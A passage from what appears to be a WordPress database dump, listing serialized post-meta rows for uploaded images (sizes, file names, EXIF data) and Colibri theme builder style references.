\"file\";s:26:\"cropped-Jean-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-Jean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"cropped-Jean-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"cropped-Jean-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1440,1094,'_oembed_a0f37d608fb49347f752d39d16b65256','{{unknown}}'),(1477,1137,'_wp_attached_file','2022/04/disaster1-scaled.jpg'),(1478,1137,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:28:\"2022/04/disaster1-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"disaster1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"disaster1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"disaster1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"disaster1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"disaster1-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:23:\"disaster1-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"disaster1.jpg\";}'),(1479,1138,'_wp_attached_file','2022/04/cropped-disaster1-scaled-1.jpg'),(1480,1138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:38:\"2022/04/cropped-disaster1-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"cropped-disaster1-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"cropped-disaster1-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"cropped-disaster1-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1481,1140,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:314;i:9;i:321;i:10;i:322;i:11;i:324;i:12;i:317;i:13;i:318;i:14;i:319;i:15;i:292;i:16;i:293;i:17;i:294;i:18;i:295;i:19;i:296;i:20;i:298;}}}'),(1492,1153,'_wp_attached_file','2022/04/BeforeSimulCast.png'),(1493,1153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:795;s:6:\"height\";i:501;s:4:\"file\";s:27:\"2022/04/BeforeSimulCast.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"BeforeSimulCast-768x484.png\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1494,1154,'_wp_attached_file','2022/04/cropped-BeforeSimulCast.png'),(1495,1154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:501;s:4:\"file\";s:35:\"2022/04/cropped-BeforeSimulCast.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"cropped-BeforeSimulCast-300x277.png\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"cropped-BeforeSimulCast-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1502,1162,'_wp_attached_file','2022/04/cropped-BeforeSimulCast-1.png'),(1503,1162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:484;s:4:\"file\";s:37:\"2022/04/cropped-BeforeSimulCast-1.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"cropped-BeforeSimulCast-1-300x259.png\";s:5:\"width\";i:300;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"cropped-BeforeSimulCast-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1528,1187,'_wp_attached_file','2022/04/388de91c055c0831e049331d9ba8335e-scaled.jpg'),(1529,1187,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:51:\"2022/04/388de91c055c0831e049331d9ba8335e-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"388de91c055c0831e049331d9ba8335e-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:45:\"388de91c055c0831e049331d9ba8335e-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"388de91c055c0831e049331d9ba8335e-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"388de91c055c0831e049331d9ba8335e-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:46:\"388de91c055c0831e049331d9ba8335e-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:46:\"388de91c055c0831e049331d9ba8335e-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1650612959\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"388de91c055c0831e049331d9ba8335e.jpg\";}'),(1530,1188,'_wp_attached_file','2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg'),(1531,1188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1919;s:6:\"height\";i:1923;s:4:\"file\";s:61:\"2022/04/cropped-388de91c055c0831e049331d9ba8335e-scaled-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-1022x1024.jpg\";s:5:\"width\";i:1022;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-768x770.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:63:\"cropped-388de91c055c0831e049331d9ba8335e-scaled-1-1533x1536.jpg\";s:5:\"width\";i:1533;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1650612959\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1532,1188,'_oembed_f87df867a07bd26b7fe22a62fccf1427','{{unknown}}'),(1548,1204,'_wp_attached_file','2022/04/Opherus.png'),(1549,1204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:664;s:6:\"height\";i:629;s:4:\"file\";s:19:\"2022/04/Opherus.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Opherus-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Opherus-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1550,1205,'_wp_attached_file','2022/04/cropped-Opherus.png'),(1551,1205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:629;s:6:\"height\";i:629;s:4:\"file\";s:27:\"2022/04/cropped-Opherus.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cropped-Opherus-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cropped-Opherus-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1577,1221,'_wp_attached_file','2022/03/cropped-cropped-cropped-headshot-1-e1651208089645.jpg'),(1578,1221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:61:\"2022/03/cropped-cropped-cropped-headshot-1-e1651208089645.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"cropped-cropped-cropped-headshot-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"cropped-cropped-cropped-headshot-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"cropped-cropped-cropped-headshot-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"cropped-cropped-cropped-headshot-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D850\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1634662262\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1579,1221,'_oembed_79852ca1990a4c2b625595643f1489dc','{{unknown}}'),(1580,1221,'_edit_lock','1696362919:1'),(1581,1221,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1500;s:6:\"height\";i:1500;s:4:\"file\";s:38:\"cropped-cropped-cropped-headshot-1.jpg\";}}'),(1582,1221,'_edit_last','1'),(1609,138,'_wp_old_date','2022-03-21'),(1611,619,'_wp_old_date','2022-03-21'),(1613,183,'_wp_old_date','2022-03-21'),(1614,186,'_wp_old_date','2022-03-21'),(1666,1281,'is_colibri-wp_front_page','1'),(1667,1281,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1668,1283,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(1673,1288,'is_colibri-wp_front_page','1'),(1674,1288,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1675,1290,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1680,1295,'is_colibri-wp_front_page','1'),(1681,1295,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1682,1297,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1687,1302,'is_colibri-wp_front_page','1'),(1688,1302,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1689,1304,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1698,1311,'is_colibri-wp_front_page','1'),(1699,1311,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1700,1313,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut 